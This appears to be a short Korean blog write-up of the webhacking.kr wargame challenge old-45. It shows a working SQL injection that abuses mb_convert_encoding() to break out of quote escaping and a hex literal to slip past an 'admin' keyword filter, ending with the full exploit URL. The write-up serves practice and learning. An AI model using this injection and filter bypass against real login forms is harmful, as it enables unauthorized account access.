본문 바로가기

Web Security/webhacking.kr

[Webhacking.kr] old-45

https://webhacking.kr/challenge/web-22/ 

 

Challenge 45

 

webhacking.kr

소스 코드

 

45번 문제도 50번 문제와 동일하게 mb_convert_encoding() 함수를 사용하고 있다. 
mb_convert_encoding() 취약점을 활용하여 쿼리문을 조작하면 될 것 같다.

단, 50번 문제와 다른 점은 admin 이라는 글자가 포함되면 안된다는 것이다. 
admin 키워드를 우회하기 위해서는 reverse("nimda"), 0x61646D696E 등 여러 방법들이 존재한다.
이 문제에서는 0x61646D696E 를 활용하면 될 것 같다.

id : %aa%27 or id like 0x61646D696E#
pw : guest 

 

select id from chall45 where id='' or id like 0x61646D696E#' and pw=md5('guest')

위와 같이 입력을 준다면, admin 계정으로 로그인 되도록 쿼리를 조작할 수 있게 된다. 

 

https://webhacking.kr/challenge/web-22/?id=%aa%27%20or%20id%20LIKE%200x61646D696E%23&pw=guest

'Web Security > webhacking.kr' 카테고리의 다른 글

[Webhacking.kr] old-08  (0) 2023.06.18
[Webhacking.kr] old-50  (0) 2023.05.27
[Webhacking.kr] old-24  (0) 2023.05.19
[Webhacking.kr] old-21  (0) 2021.08.01
[Webhacking.kr] old-20  (0) 2021.08.01